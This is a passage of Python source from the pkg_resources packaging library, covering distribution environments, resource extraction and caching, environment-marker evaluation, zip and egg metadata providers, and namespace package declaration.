self.by_key = by_key.copy()
self.callbacks = callbacks[:]
class Environment(object):
"""Searchable snapshot of distributions on a search path"""
def __init__(self, search_path=None, platform=get_supported_platform(),
python=PY_MAJOR):
"""Snapshot distributions available on a search path
Any distributions found on `search_path` are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used.
`platform` is an optional string specifying the name of the platform
that platform-specific distributions must be compatible with. If
unspecified, it defaults to the current platform. `python` is an
optional string naming the desired version of Python (e.g. ``'3.3'``);
it defaults to the current version.
You may explicitly set `platform` (and/or `python`) to ``None`` if you
wish to map *all* distributions, not just those compatible with the
running platform or Python version.
"""
self._distmap = {}
self.platform = platform
self.python = python
self.scan(search_path)
def can_add(self, dist):
"""Is distribution `dist` acceptable for this environment?
The distribution must match the platform and python version
requirements specified when this environment was created, or False
is returned.
"""
        return (
            (self.python is None or dist.py_version is None
             or dist.py_version == self.python)
            and compatible_platforms(dist.platform, self.platform)
        )
def remove(self, dist):
"""Remove `dist` from the environment"""
self._distmap[dist.key].remove(dist)
def scan(self, search_path=None):
"""Scan `search_path` for distributions usable in this environment
Any distributions found are added to the environment.
`search_path` should be a sequence of ``sys.path`` items. If not
supplied, ``sys.path`` is used. Only distributions conforming to
the platform/python version defined at initialization are added.
"""
if search_path is None:
search_path = sys.path
for item in search_path:
for dist in find_distributions(item):
self.add(dist)
def __getitem__(self, project_name):
"""Return a newest-to-oldest list of distributions for `project_name`
Uses case-insensitive `project_name` comparison, assuming all the
project's distributions use their project's name converted to all
lowercase as their key.
"""
distribution_key = project_name.lower()
return self._distmap.get(distribution_key, [])
def add(self, dist):
"""Add `dist` if we ``can_add()`` it and it has not already been added
"""
if self.can_add(dist) and dist.has_version():
dists = self._distmap.setdefault(dist.key, [])
if dist not in dists:
dists.append(dist)
dists.sort(key=operator.attrgetter('hashcmp'), reverse=True)
def best_match(self, req, working_set, installer=None):
"""Find distribution best matching `req` and usable on `working_set`
This calls the ``find(req)`` method of the `working_set` to see if a
suitable distribution is already active. (This may raise
``VersionConflict`` if an unsuitable version of the project is already
active in the specified `working_set`.) If a suitable distribution
isn't active, this method returns the newest distribution in the
environment that meets the ``Requirement`` in `req`. If no suitable
distribution is found, and `installer` is supplied, then the result of
calling the environment's ``obtain(req, installer)`` method will be
returned.
"""
dist = working_set.find(req)
if dist is not None:
return dist
for dist in self[req.key]:
if dist in req:
return dist
# try to download/install
return self.obtain(req, installer)
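    # Illustrative sketch (not part of the original module): picking the
    # best available distribution for a requirement. 'FooPkg' is a
    # hypothetical project name.
    #
    #     env = Environment()                    # snapshot of sys.path
    #     req = Requirement.parse('FooPkg>=1.0')
    #     dist = env.best_match(req, working_set)
    #     if dist is not None:
    #         print(dist.location)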
def obtain(self, requirement, installer=None):
"""Obtain a distribution matching `requirement` (e.g. via download)
Obtain a distro that matches requirement (e.g. via download). In the
base ``Environment`` class, this routine just returns
``installer(requirement)``, unless `installer` is None, in which case
None is returned instead. This method is a hook that allows subclasses
to attempt other ways of obtaining a distribution before falling back
to the `installer` argument."""
if installer is not None:
return installer(requirement)
def __iter__(self):
"""Yield the unique project names of the available distributions"""
for key in self._distmap.keys():
if self[key]:
yield key
def __iadd__(self, other):
"""In-place addition of a distribution or environment"""
if isinstance(other, Distribution):
self.add(other)
elif isinstance(other, Environment):
for project in other:
for dist in other[project]:
self.add(dist)
else:
raise TypeError("Can't add %r to environment" % (other,))
return self
def __add__(self, other):
"""Add an environment or distribution to an environment"""
new = self.__class__([], platform=None, python=None)
for env in self, other:
new += env
return new
# XXX backward compatibility
AvailableDistributions = Environment
class ExtractionError(RuntimeError):
"""An error occurred extracting a resource
The following attributes are available from instances of this exception:
manager
The resource manager that raised this exception
cache_path
The base directory for resource extraction
original_error
The exception instance that caused extraction to fail
"""
class ResourceManager:
"""Manage resource extraction and packages"""
extraction_path = None
def __init__(self):
self.cached_files = {}
def resource_exists(self, package_or_requirement, resource_name):
"""Does the named resource exist?"""
return get_provider(package_or_requirement).has_resource(resource_name)
def resource_isdir(self, package_or_requirement, resource_name):
"""Is the named resource an existing directory?"""
return get_provider(package_or_requirement).resource_isdir(
resource_name
)
def resource_filename(self, package_or_requirement, resource_name):
"""Return a true filesystem path for specified resource"""
return get_provider(package_or_requirement).get_resource_filename(
self, resource_name
)
def resource_stream(self, package_or_requirement, resource_name):
"""Return a readable file-like object for specified resource"""
return get_provider(package_or_requirement).get_resource_stream(
self, resource_name
)
def resource_string(self, package_or_requirement, resource_name):
"""Return specified resource as a string"""
return get_provider(package_or_requirement).get_resource_string(
self, resource_name
)
def resource_listdir(self, package_or_requirement, resource_name):
"""List the contents of the named resource directory"""
return get_provider(package_or_requirement).resource_listdir(
resource_name
)
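    # Illustrative sketch: these methods back the module-level convenience
    # functions bound in _initialize() near the end of this file. 'mypkg'
    # and the resource paths are hypothetical placeholders.
    #
    #     import pkg_resources
    #     data = pkg_resources.resource_string('mypkg', 'data/defaults.cfg')
    #     if pkg_resources.resource_isdir('mypkg', 'templates'):
    #         names = pkg_resources.resource_listdir('mypkg', 'templates')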
def extraction_error(self):
"""Give an error message for problems extracting file(s)"""
old_exc = sys.exc_info()[1]
cache_path = self.extraction_path or get_default_cache()
err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
)
err.manager = self
err.cache_path = cache_path
err.original_error = old_exc
raise err
def get_cache_path(self, archive_name, names=()):
"""Return absolute location in cache for `archive_name` and `names`
The parent directory of the resulting path will be created if it does
not already exist. `archive_name` should be the base filename of the
enclosing egg (which may not be the name of the enclosing zipfile!),
including its ".egg" extension. `names`, if provided, should be a
sequence of path name parts "under" the egg's extraction location.
This method should only be called by resource providers that need to
obtain an extraction location, and only for names they intend to
extract, as it tracks the generated names for possible cleanup later.
"""
extract_path = self.extraction_path or get_default_cache()
target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
try:
_bypass_ensure_directory(target_path)
        except Exception:
self.extraction_error()
self._warn_unsafe_extraction_path(extract_path)
self.cached_files[target_path] = 1
return target_path
@staticmethod
def _warn_unsafe_extraction_path(path):
"""
If the default extraction path is overridden and set to an insecure
location, such as /tmp, it opens up an opportunity for an attacker to
replace an extracted file with an unauthorized payload. Warn the user
if a known insecure location is used.
See Distribute #375 for more details.
"""
if os.name == 'nt' and not path.startswith(os.environ['windir']):
# On Windows, permissions are generally restrictive by default
# and temp directories are not writable by other users, so
# bypass the warning.
return
mode = os.stat(path).st_mode
if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
msg = ("%s is writable by group/others and vulnerable to attack "
"when "
"used with get_resource_filename. Consider a more secure "
"location (set with .set_extraction_path or the "
"PYTHON_EGG_CACHE environment variable)." % path)
warnings.warn(msg, UserWarning)
def postprocess(self, tempname, filename):
"""Perform any platform-specific postprocessing of `tempname`
This is where Mac header rewrites should be done; other platforms don't
have anything special they should do.
Resource providers should call this method ONLY after successfully
extracting a compressed resource. They must NOT call it on resources
that are already in the filesystem.
`tempname` is the current (temporary) name of the file, and `filename`
is the name it will be renamed to by the caller after this routine
returns.
"""
if os.name == 'posix':
# Make the resource executable
mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777
os.chmod(tempname, mode)
def set_extraction_path(self, path):
"""Set the base path where resources will be extracted to, if needed.
If you do not call this routine before any extractions take place, the
path defaults to the return value of ``get_default_cache()``. (Which
is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
platform-specific fallbacks. See that routine's documentation for more
details.)
Resources are extracted to subdirectories of this path based upon
information given by the ``IResourceProvider``. You may set this to a
temporary directory, but then you must call ``cleanup_resources()`` to
delete the extracted files when done. There is no guarantee that
``cleanup_resources()`` will be able to remove all extracted files.
(Note: you may not change the extraction path for a given resource
manager once resources have been extracted, unless you first call
``cleanup_resources()``.)
"""
if self.cached_files:
raise ValueError(
"Can't change extraction path, files already extracted"
)
self.extraction_path = path
def cleanup_resources(self, force=False):
"""
Delete all extracted resource files and directories, returning a list
of the file and directory names that could not be successfully removed.
This function does not have any concurrency protection, so it should
generally only be called when the extraction path is a temporary
directory exclusive to a single process. This method is not
automatically called; you must call it explicitly or register it as an
``atexit`` function if you wish to ensure cleanup of a temporary
directory used for extractions.
"""
# XXX
def get_default_cache():
"""Determine the default cache location
This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
"Application Data" directory. On all other systems, it's "~/.python-eggs".
"""
try:
return os.environ['PYTHON_EGG_CACHE']
except KeyError:
pass
if os.name!='nt':
return os.path.expanduser('~/.python-eggs')
# XXX this may be locale-specific!
app_data = 'Application Data'
app_homes = [
# best option, should be locale-safe
(('APPDATA',), None),
(('USERPROFILE',), app_data),
(('HOMEDRIVE','HOMEPATH'), app_data),
(('HOMEPATH',), app_data),
(('HOME',), None),
# 95/98/ME
(('WINDIR',), app_data),
]
for keys, subdir in app_homes:
dirname = ''
for key in keys:
if key in os.environ:
dirname = os.path.join(dirname, os.environ[key])
else:
break
else:
if subdir:
dirname = os.path.join(dirname, subdir)
return os.path.join(dirname, 'Python-Eggs')
else:
raise RuntimeError(
"Please set the PYTHON_EGG_CACHE enviroment variable"
)
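# Illustrative sketch (assumption: set before any extraction happens): the
# cache location can be redirected through the environment.
#
#     os.environ['PYTHON_EGG_CACHE'] = '/var/cache/python-eggs'
#     get_default_cache()    # -> '/var/cache/python-eggs'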
def safe_name(name):
"""Convert an arbitrary string to a standard distribution name
Any runs of non-alphanumeric/. characters are replaced with a single '-'.
"""
return re.sub('[^A-Za-z0-9.]+', '-', name)
def safe_version(version):
"""
Convert an arbitrary string to a standard version string
"""
try:
# normalize the version
return str(packaging.version.Version(version))
except packaging.version.InvalidVersion:
version = version.replace(' ','.')
return re.sub('[^A-Za-z0-9.]+', '-', version)
def safe_extra(extra):
"""Convert an arbitrary string to a standard 'extra' name
Any runs of non-alphanumeric characters are replaced with a single '_',
and the result is always lowercased.
"""
return re.sub('[^A-Za-z0-9.]+', '_', extra).lower()
def to_filename(name):
"""Convert a project or version name to its filename-escaped form
Any '-' characters are currently replaced with '_'.
"""
return name.replace('-','_')
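# Illustrative examples of the normalization helpers above:
#
#     safe_name('my_project')      # -> 'my-project'
#     safe_version('1.0 beta')     # -> '1.0.beta'
#     safe_extra('Feature-1')      # -> 'feature_1'
#     to_filename('my-project')    # -> 'my_project'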
class MarkerEvaluation(object):
values = {
'os_name': lambda: os.name,
'sys_platform': lambda: sys.platform,
'python_full_version': platform.python_version,
'python_version': lambda: platform.python_version()[:3],
'platform_version': platform.version,
'platform_machine': platform.machine,
'python_implementation': platform.python_implementation,
}
@classmethod
def is_invalid_marker(cls, text):
"""
        Validate text as a PEP 426 environment marker; return an exception
        instance if invalid, or False otherwise.
"""
try:
cls.evaluate_marker(text)
except SyntaxError as e:
return cls.normalize_exception(e)
return False
@staticmethod
def normalize_exception(exc):
"""
Given a SyntaxError from a marker evaluation, normalize the error
message:
- Remove indications of filename and line number.
- Replace platform-specific error messages with standard error
messages.
"""
subs = {
'unexpected EOF while parsing': 'invalid syntax',
'parenthesis is never closed': 'invalid syntax',
}
exc.filename = None
exc.lineno = None
exc.msg = subs.get(exc.msg, exc.msg)
return exc
@classmethod
def and_test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.and_, items)
@classmethod
def test(cls, nodelist):
# MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
items = [
cls.interpret(nodelist[i])
for i in range(1, len(nodelist), 2)
]
return functools.reduce(operator.or_, items)
@classmethod
def atom(cls, nodelist):
t = nodelist[1][0]
if t == token.LPAR:
if nodelist[2][0] == token.RPAR:
raise SyntaxError("Empty parentheses")
return cls.interpret(nodelist[2])
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@classmethod
def comparison(cls, nodelist):
if len(nodelist) > 4:
msg = "Chained comparison not allowed in environment markers"
raise SyntaxError(msg)
comp = nodelist[2][1]
cop = comp[1]
if comp[0] == token.NAME:
if len(nodelist[2]) == 3:
if cop == 'not':
cop = 'not in'
else:
cop = 'is not'
try:
cop = cls.get_op(cop)
except KeyError:
msg = repr(cop) + " operator not allowed in environment markers"
raise SyntaxError(msg)
return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
@classmethod
def get_op(cls, op):
ops = {
symbol.test: cls.test,
symbol.and_test: cls.and_test,
symbol.atom: cls.atom,
symbol.comparison: cls.comparison,
'not in': lambda x, y: x not in y,
'in': lambda x, y: x in y,
'==': operator.eq,
'!=': operator.ne,
'<': operator.lt,
'>': operator.gt,
'<=': operator.le,
'>=': operator.ge,
}
if hasattr(symbol, 'or_test'):
ops[symbol.or_test] = cls.test
return ops[op]
@classmethod
def evaluate_marker(cls, text, extra=None):
"""
Evaluate a PEP 426 environment marker on CPython 2.4+.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
        This implementation uses the 'parser' module, which is not
        implemented on Jython and has been superseded by the 'ast' module in
        Python 2.6 and later.
"""
return cls.interpret(parser.expr(text).totuple(1)[1])
@classmethod
def _markerlib_evaluate(cls, text):
"""
Evaluate a PEP 426 environment marker using markerlib.
Return a boolean indicating the marker result in this environment.
Raise SyntaxError if marker is invalid.
"""
from pip._vendor import _markerlib
# markerlib implements Metadata 1.2 (PEP 345) environment markers.
# Translate the variables to Metadata 2.0 (PEP 426).
env = _markerlib.default_environment()
for key in env.keys():
new_key = key.replace('.', '_')
env[new_key] = env.pop(key)
try:
result = _markerlib.interpret(text, env)
except NameError as e:
raise SyntaxError(e.args[0])
return result
if 'parser' not in globals():
# Fall back to less-complete _markerlib implementation if 'parser' module
# is not available.
evaluate_marker = _markerlib_evaluate
@classmethod
def interpret(cls, nodelist):
        while len(nodelist) == 2:
            nodelist = nodelist[1]
try:
op = cls.get_op(nodelist[0])
except KeyError:
raise SyntaxError("Comparison or logical expression expected")
return op(nodelist)
@classmethod
def evaluate(cls, nodelist):
        while len(nodelist) == 2:
            nodelist = nodelist[1]
kind = nodelist[0]
name = nodelist[1]
if kind==token.NAME:
try:
op = cls.values[name]
except KeyError:
raise SyntaxError("Unknown name %r" % name)
return op()
if kind==token.STRING:
s = nodelist[1]
if not cls._safe_string(s):
raise SyntaxError(
"Only plain strings allowed in environment markers")
return s[1:-1]
msg = "Language feature not supported in environment markers"
raise SyntaxError(msg)
@staticmethod
def _safe_string(cand):
return (
cand[:1] in "'\"" and
not cand.startswith('"""') and
not cand.startswith("'''") and
'\\' not in cand
)
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
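# Illustrative sketch: evaluating environment markers via the module-level
# aliases above. evaluate_marker returns a bool or raises SyntaxError;
# invalid_marker returns the normalized exception instance, or False.
#
#     evaluate_marker("python_version >= '2.6'")    # -> True or False
#     invalid_marker("os_name ===")                 # -> SyntaxError instance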
class NullProvider:
"""Try to implement resources and metadata for arbitrary PEP 302 loaders"""
egg_name = None
egg_info = None
loader = None
def __init__(self, module):
self.loader = getattr(module, '__loader__', None)
self.module_path = os.path.dirname(getattr(module, '__file__', ''))
def get_resource_filename(self, manager, resource_name):
return self._fn(self.module_path, resource_name)
def get_resource_stream(self, manager, resource_name):
return io.BytesIO(self.get_resource_string(manager, resource_name))
def get_resource_string(self, manager, resource_name):
return self._get(self._fn(self.module_path, resource_name))
def has_resource(self, resource_name):
return self._has(self._fn(self.module_path, resource_name))
def has_metadata(self, name):
return self.egg_info and self._has(self._fn(self.egg_info, name))
if sys.version_info <= (3,):
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name))
else:
def get_metadata(self, name):
if not self.egg_info:
return ""
return self._get(self._fn(self.egg_info, name)).decode("utf-8")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
def resource_isdir(self, resource_name):
return self._isdir(self._fn(self.module_path, resource_name))
def metadata_isdir(self, name):
return self.egg_info and self._isdir(self._fn(self.egg_info, name))
def resource_listdir(self, resource_name):
return self._listdir(self._fn(self.module_path, resource_name))
def metadata_listdir(self, name):
if self.egg_info:
return self._listdir(self._fn(self.egg_info, name))
return []
def run_script(self, script_name, namespace):
script = 'scripts/'+script_name
if not self.has_metadata(script):
raise ResolutionError("No script named %r" % script_name)
script_text = self.get_metadata(script).replace('\r\n', '\n')
script_text = script_text.replace('\r', '\n')
script_filename = self._fn(self.egg_info, script)
namespace['__file__'] = script_filename
if os.path.exists(script_filename):
source = open(script_filename).read()
code = compile(source, script_filename, 'exec')
exec(code, namespace, namespace)
else:
from linecache import cache
cache[script_filename] = (
len(script_text), 0, script_text.split('\n'), script_filename
)
script_code = compile(script_text, script_filename,'exec')
exec(script_code, namespace, namespace)
def _has(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _isdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _listdir(self, path):
raise NotImplementedError(
"Can't perform this operation for unregistered loader type"
)
def _fn(self, base, resource_name):
if resource_name:
return os.path.join(base, *resource_name.split('/'))
return base
def _get(self, path):
if hasattr(self.loader, 'get_data'):
return self.loader.get_data(path)
raise NotImplementedError(
"Can't perform this operation for loaders without 'get_data()'"
)
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
"""Provider based on a virtual filesystem"""
def __init__(self, module):
NullProvider.__init__(self, module)
self._setup_prefix()
def _setup_prefix(self):
# we assume here that our metadata may be nested inside a "basket"
# of multiple eggs; that's why we use module_path instead of .archive
path = self.module_path
old = None
while path!=old:
if path.lower().endswith('.egg'):
self.egg_name = os.path.basename(path)
self.egg_info = os.path.join(path, 'EGG-INFO')
self.egg_root = path
break
old = path
path, base = os.path.split(path)
class DefaultProvider(EggProvider):
"""Provides access to package resources in the filesystem"""
def _has(self, path):
return os.path.exists(path)
def _isdir(self, path):
return os.path.isdir(path)
def _listdir(self, path):
return os.listdir(path)
def get_resource_stream(self, manager, resource_name):
return open(self._fn(self.module_path, resource_name), 'rb')
def _get(self, path):
with open(path, 'rb') as stream:
return stream.read()
register_loader_type(type(None), DefaultProvider)
if importlib_machinery is not None:
register_loader_type(importlib_machinery.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
"""Provider that returns nothing for all requests"""
_isdir = _has = lambda self, path: False
_get = lambda self, path: ''
_listdir = lambda self, path: []
module_path = None
def __init__(self):
pass
empty_provider = EmptyProvider()
class ZipManifests(dict):
"""
zip manifest builder
"""
@classmethod
def build(cls, path):
"""
Build a dictionary similar to the zipimport directory
caches, except instead of tuples, store ZipInfo objects.
Use a platform-specific path separator (os.sep) for the path keys
for compatibility with pypy on Windows.
"""
with ContextualZipFile(path) as zfile:
items = (
(
name.replace('/', os.sep),
zfile.getinfo(name),
)
for name in zfile.namelist()
)
return dict(items)
load = build
class MemoizedZipManifests(ZipManifests):
"""
Memoized zipfile manifests.
"""
manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime')
def load(self, path):
"""
Load a manifest at path or return a suitable manifest already loaded.
"""
path = os.path.normpath(path)
mtime = os.stat(path).st_mtime
if path not in self or self[path].mtime != mtime:
manifest = self.build(path)
self[path] = self.manifest_mod(manifest, mtime)
return self[path].manifest
class ContextualZipFile(zipfile.ZipFile):
"""
Supplement ZipFile class to support context manager for Python 2.6
"""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""
Construct a ZipFile or ContextualZipFile as appropriate
"""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
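# Illustrative sketch: ContextualZipFile is used like a normal ZipFile but
# works as a context manager even on Python 2.6. The archive path is a
# hypothetical placeholder.
#
#     with ContextualZipFile('/path/to/archive.egg') as zf:
#         names = zf.namelist()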
class ZipProvider(EggProvider):
"""Resource support for zips and eggs"""
eagers = None
_zip_manifests = MemoizedZipManifests()
def __init__(self, module):
EggProvider.__init__(self, module)
self.zip_pre = self.loader.archive+os.sep
def _zipinfo_name(self, fspath):
# Convert a virtual filename (full path to file) into a zipfile subpath
# usable with the zipimport directory cache for our target archive
if fspath.startswith(self.zip_pre):
return fspath[len(self.zip_pre):]
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.zip_pre)
)
def _parts(self, zip_path):
# Convert a zipfile subpath into an egg-relative path part list.
# pseudo-fs path
fspath = self.zip_pre+zip_path
if fspath.startswith(self.egg_root+os.sep):
return fspath[len(self.egg_root)+1:].split(os.sep)
raise AssertionError(
"%s is not a subpath of %s" % (fspath, self.egg_root)
)
@property
def zipinfo(self):
return self._zip_manifests.load(self.loader.archive)
def get_resource_filename(self, manager, resource_name):
if not self.egg_name:
raise NotImplementedError(
"resource_filename() only supported for .egg, not .zip"
)
# no need to lock for extraction, since we use temp names
zip_path = self._resource_to_zip(resource_name)
eagers = self._get_eager_resources()
if '/'.join(self._parts(zip_path)) in eagers:
for name in eagers:
self._extract_resource(manager, self._eager_to_zip(name))
return self._extract_resource(manager, zip_path)
@staticmethod
def _get_date_and_size(zip_stat):
size = zip_stat.file_size
# ymdhms+wday, yday, dst
date_time = zip_stat.date_time + (0, 0, -1)
# 1980 offset already done
timestamp = time.mktime(date_time)
return timestamp, size
def _extract_resource(self, manager, zip_path):
if zip_path in self._index():
for name in self._index()[zip_path]:
last = self._extract_resource(
manager, os.path.join(zip_path, name)
)
# return the extracted directory name
return os.path.dirname(last)
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not WRITE_SUPPORT:
raise IOError('"os.rename" and "os.unlink" are not supported '
'on this platform')
try:
real_path = manager.get_cache_path(
self.egg_name, self._parts(zip_path)
)
if self._is_current(real_path, zip_path):
return real_path
outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
os.write(outf, self.loader.get_data(zip_path))
os.close(outf)
utime(tmpnam, (timestamp, timestamp))
manager.postprocess(tmpnam, real_path)
try:
rename(tmpnam, real_path)
except os.error:
if os.path.isfile(real_path):
if self._is_current(real_path, zip_path):
# the file became current since it was checked above,
# so proceed.
return real_path
# Windows, del old file and retry
elif os.name=='nt':
unlink(real_path)
rename(tmpnam, real_path)
return real_path
raise
except os.error:
# report a user-friendly error
manager.extraction_error()
return real_path
def _is_current(self, file_path, zip_path):
"""
Return True if the file_path is current for this zip_path
"""
timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
if not os.path.isfile(file_path):
return False
stat = os.stat(file_path)
if stat.st_size!=size or stat.st_mtime!=timestamp:
return False
# check that the contents match
zip_contents = self.loader.get_data(zip_path)
with open(file_path, 'rb') as f:
file_contents = f.read()
return zip_contents == file_contents
def _get_eager_resources(self):
if self.eagers is None:
eagers = []
for name in ('native_libs.txt', 'eager_resources.txt'):
if self.has_metadata(name):
eagers.extend(self.get_metadata_lines(name))
self.eagers = eagers
return self.eagers
def _index(self):
try:
return self._dirindex
except AttributeError:
ind = {}
for path in self.zipinfo:
parts = path.split(os.sep)
while parts:
parent = os.sep.join(parts[:-1])
if parent in ind:
ind[parent].append(parts[-1])
break
else:
ind[parent] = [parts.pop()]
self._dirindex = ind
return ind
def _has(self, fspath):
zip_path = self._zipinfo_name(fspath)
return zip_path in self.zipinfo or zip_path in self._index()
def _isdir(self, fspath):
return self._zipinfo_name(fspath) in self._index()
def _listdir(self, fspath):
return list(self._index().get(self._zipinfo_name(fspath), ()))
def _eager_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.egg_root, resource_name))
def _resource_to_zip(self, resource_name):
return self._zipinfo_name(self._fn(self.module_path, resource_name))
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
"""Metadata handler for standalone PKG-INFO files
Usage::
metadata = FileMetadata("/path/to/PKG-INFO")
This provider rejects all data and metadata requests except for PKG-INFO,
which is treated as existing, and will be the contents of the file at
the provided location.
"""
def __init__(self, path):
self.path = path
def has_metadata(self, name):
return name=='PKG-INFO'
def get_metadata(self, name):
if name=='PKG-INFO':
with open(self.path,'rU') as f:
metadata = f.read()
return metadata
raise KeyError("No metadata except PKG-INFO is available")
def get_metadata_lines(self, name):
return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
"""Metadata provider for egg directories
Usage::
# Development eggs:
egg_info = "/path/to/PackageName.egg-info"
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(basedir, project_name=dist_name, metadata=metadata)
# Unpacked egg directories:
egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
dist = Distribution.from_filename(egg_path, metadata=metadata)
"""
def __init__(self, path, egg_info):
self.module_path = path
self.egg_info = egg_info
class EggMetadata(ZipProvider):
"""Metadata provider for .egg files"""
def __init__(self, importer):
"""Create a metadata provider from a zipimporter"""
self.zip_pre = importer.archive+os.sep
self.loader = importer
if importer.prefix:
self.module_path = os.path.join(importer.archive, importer.prefix)
else:
self.module_path = importer.archive
self._setup_prefix()
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
"""Register `distribution_finder` to find distributions in sys.path items
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `distribution_finder` is a callable that, passed a path
item and the importer instance, yields ``Distribution`` instances found on
that path item. See ``pkg_resources.find_on_path`` for an example."""
_distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
"""Yield distributions accessible via `path_item`"""
importer = get_importer(path_item)
finder = _find_adapter(_distribution_finders, importer)
return finder(importer, path_item, only)
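# Illustrative sketch: scanning a single sys.path entry for distributions.
# The directory path is a hypothetical placeholder.
#
#     for dist in find_distributions('/usr/lib/python2.7/site-packages'):
#         print(dist.project_name, dist.version)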
def find_eggs_in_zip(importer, path_item, only=False):
"""
Find eggs in zip files; possibly multiple nested eggs.
"""
if importer.archive.endswith('.whl'):
# wheels are not supported with this finder
# they don't have PKG-INFO metadata, and won't ever contain eggs
return
metadata = EggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield Distribution.from_filename(path_item, metadata=metadata)
if only:
# don't yield nested distros
return
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
register_finder(zipimport.zipimporter, find_eggs_in_zip)
def find_nothing(importer, path_item, only=False):
return ()
register_finder(object, find_nothing)
def find_on_path(importer, path_item, only=False):
"""Yield distributions accessible on a sys.path directory"""
path_item = _normalize_cached(path_item)
if os.path.isdir(path_item) and os.access(path_item, os.R_OK):
if path_item.lower().endswith('.egg'):
# unpacked egg
yield Distribution.from_filename(
path_item, metadata=PathMetadata(
path_item, os.path.join(path_item,'EGG-INFO')
)
)
else:
# scan for .egg and .egg-info in directory
for entry in os.listdir(path_item):
lower = entry.lower()
if lower.endswith('.egg-info') or lower.endswith('.dist-info'):
fullpath = os.path.join(path_item, entry)
if os.path.isdir(fullpath):
# egg-info directory, allow getting metadata
metadata = PathMetadata(path_item, fullpath)
else:
metadata = FileMetadata(fullpath)
yield Distribution.from_location(
path_item, entry, metadata, precedence=DEVELOP_DIST
)
elif not only and lower.endswith('.egg'):
dists = find_distributions(os.path.join(path_item, entry))
for dist in dists:
yield dist
elif not only and lower.endswith('.egg-link'):
with open(os.path.join(path_item, entry)) as entry_file:
entry_lines = entry_file.readlines()
for line in entry_lines:
if not line.strip():
continue
path = os.path.join(path_item, line.rstrip())
dists = find_distributions(path)
for item in dists:
yield item
break
register_finder(pkgutil.ImpImporter, find_on_path)
if importlib_machinery is not None:
register_finder(importlib_machinery.FileFinder, find_on_path)
_declare_state('dict', _namespace_handlers={})
_declare_state('dict', _namespace_packages={})
def register_namespace_handler(importer_type, namespace_handler):
"""Register `namespace_handler` to declare namespace packages
`importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
handler), and `namespace_handler` is a callable like this::
def namespace_handler(importer, path_entry, moduleName, module):
# return a path_entry to use for child packages
Namespace handlers are only called if the importer object has already
agreed that it can handle the relevant path item, and they should only
return a subpath if the module __path__ does not already contain an
equivalent subpath. For an example namespace handler, see
``pkg_resources.file_ns_handler``.
"""
_namespace_handlers[importer_type] = namespace_handler
def _handle_ns(packageName, path_item):
"""Ensure that named package includes a subpath of path_item (if needed)"""
importer = get_importer(path_item)
if importer is None:
return None
loader = importer.find_module(packageName)
if loader is None:
return None
module = sys.modules.get(packageName)
if module is None:
module = sys.modules[packageName] = types.ModuleType(packageName)
module.__path__ = []
_set_parent_ns(packageName)
elif not hasattr(module,'__path__'):
raise TypeError("Not a package:", packageName)
handler = _find_adapter(_namespace_handlers, importer)
subpath = handler(importer, path_item, packageName, module)
if subpath is not None:
path = module.__path__
path.append(subpath)
loader.load_module(packageName)
for path_item in path:
if path_item not in module.__path__:
module.__path__.append(path_item)
return subpath
def declare_namespace(packageName):
"""Declare that package 'packageName' is a namespace package"""
_imp.acquire_lock()
try:
if packageName in _namespace_packages:
return
path, parent = sys.path, None
if '.' in packageName:
parent = '.'.join(packageName.split('.')[:-1])
declare_namespace(parent)
if parent not in _namespace_packages:
__import__(parent)
try:
path = sys.modules[parent].__path__
except AttributeError:
raise TypeError("Not a package:", parent)
# Track what packages are namespaces, so when new path items are added,
# they can be updated
_namespace_packages.setdefault(parent,[]).append(packageName)
_namespace_packages.setdefault(packageName,[])
